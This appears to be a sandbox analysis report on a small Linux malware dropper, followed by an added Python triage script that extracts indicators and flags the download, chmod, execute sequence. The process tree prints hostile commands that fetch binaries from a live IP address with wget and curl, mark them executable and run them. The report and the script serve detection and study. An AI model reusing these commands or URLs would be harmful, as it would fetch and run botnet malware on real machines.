Analysis

  • max time kernel
    139s
  • max time network
    148s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    29-07-2024 05:16

General

  • Target

    3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118

  • Size

    2KB

  • MD5

    3964a03b43bd29681a1cbabe37ff0be5

  • SHA1

    45077644cf8c6a6356a4b8a633618ab7d994ff63

  • SHA256

    06a10886d5e417be9f942bae7221d301552d490f2c4914e163a766ec4731cbeb

  • SHA512

    0e364a22d00875879d5b6af408891ff34e39db6a48f19fd1208a40507b88d60274b9416813bddff6e334933ec52553d94a5339459f9d314beda98b33fcf911a6

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine. In this run the signature fired on /usr/bin/curl (PID 652), a stock system binary, rather than on the submitted sample itself (see Processes).

  • Reads runtime system information 2 IoCs

    Reads data from the /proc virtual filesystem. Also attributed to /usr/bin/curl (PID 652) in this run, not to the submitted sample.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
    /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:643
    • /usr/bin/wget
      wget http://185.172.111.210/bins/GOOGLE.x86
      2⤵
      PID:644
    • /usr/bin/curl
      curl -O http://185.172.111.210/bins/GOOGLE.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:652
    • /bin/cat
      cat GOOGLE.x86
      2⤵
      PID:682
    • /bin/chmod
      chmod +x 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118 SPLOIT
      2⤵
      PID:683
    • /tmp/SPLOIT
      ./SPLOIT x86.GOOGLE
      2⤵
      • Executes dropped EXE
      PID:684
    • /usr/bin/wget
      wget http://185.172.111.210/bins/GOOGLE.mips
      2⤵
      PID:686
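As an added triage helper (not part of the sandbox report or of the sample), the script below takes the command lines recorded in the process tree above, embedded here as constructed input copied from the report, extracts the download URLs, the distribution host, the architecture suffixes of the fetched binaries and the files the script marks executable or runs, and flags the download, chmod +x, execute-from-cwd sequence that the tree shows. The function names and the `DOWNLOADERS` list are my own choices.

```python
import re
from urllib.parse import urlparse

# Constructed input: the command lines from the Processes section of the report,
# in the order the sandbox recorded them.
REPORT_CMDLINES = [
    "/tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118",
    "wget http://185.172.111.210/bins/GOOGLE.x86",
    "curl -O http://185.172.111.210/bins/GOOGLE.x86",
    "cat GOOGLE.x86",
    "chmod +x 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118 SPLOIT",
    "./SPLOIT x86.GOOGLE",
    "wget http://185.172.111.210/bins/GOOGLE.mips",
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Fetch tools commonly seen in Linux droppers (assumed list, extend as needed).
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")


def _prog(argv):
    """Basename of argv[0], so /usr/bin/wget and wget compare equal."""
    return argv[0].rsplit("/", 1)[-1]


def _marks_executable(argv):
    """True for chmod invocations such as +x / a+x or an octal mode with an x bit."""
    for a in argv[1:]:
        if a.startswith("-"):
            continue
        if "+" in a and "x" in a:
            return True
        if re.fullmatch(r"[0-7]{3,4}", a) and int(a[-3:], 8) & 0o111:
            return True
    return False


def extract_iocs(cmdlines):
    """Collect URLs, hosts, architecture suffixes and executable names from argv records."""
    urls, hosts, archs, executables = [], set(), set(), set()
    for cmd in cmdlines:
        argv = cmd.split()
        if not argv:
            continue
        for url in URL_RE.findall(cmd):
            if url not in urls:
                urls.append(url)
            parsed = urlparse(url)
            hosts.add(parsed.hostname)
            name = parsed.path.rsplit("/", 1)[-1]
            if "." in name:  # GOOGLE.x86 -> x86, GOOGLE.mips -> mips
                archs.add(name.rsplit(".", 1)[-1])
        if _prog(argv) == "chmod" and len(argv) > 2:
            executables.update(a for a in argv[2:] if not a.startswith("-"))
        elif argv[0].startswith("./"):
            executables.add(argv[0][2:])
    return {
        "urls": urls,
        "hosts": sorted(hosts),
        "archs": sorted(archs),
        "executables": sorted(executables),
    }


def detect_dropper_chain(cmdlines):
    """True when a fetch (wget/curl...), then chmod +x, then ./x or /tmp/x execution appear in order.

    Only argv is available: shell redirections (e.g. how GOOGLE.x86 became SPLOIT via the
    cat step) are not recorded in the tree, so the chain is matched on what is visible.
    """
    stage = 0
    for cmd in cmdlines:
        argv = cmd.split()
        if not argv:
            continue
        if stage == 0 and _prog(argv) in DOWNLOADERS and URL_RE.search(cmd):
            stage = 1
        elif stage == 1 and _prog(argv) == "chmod" and _marks_executable(argv):
            stage = 2
        elif stage == 2 and (argv[0].startswith("./") or argv[0].startswith("/tmp/")):
            return True
    return False


if __name__ == "__main__":
    print(extract_iocs(REPORT_CMDLINES))
    print("dropper chain:", detect_dropper_chain(REPORT_CMDLINES))
```

Two points worth keeping in mind when reading the output against the report: the sandbox ran on armhf (see Analysis), yet the script fetched GOOGLE.x86 first and went on to GOOGLE.mips after running SPLOIT, so the fetched architecture does not tell you what the victim is, only what the script tries; and because the tree records argv only, the cat step appears as a plain read even though SPLOIT is executed right after it.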

Network

MITRE ATT&CK Enterprise v15
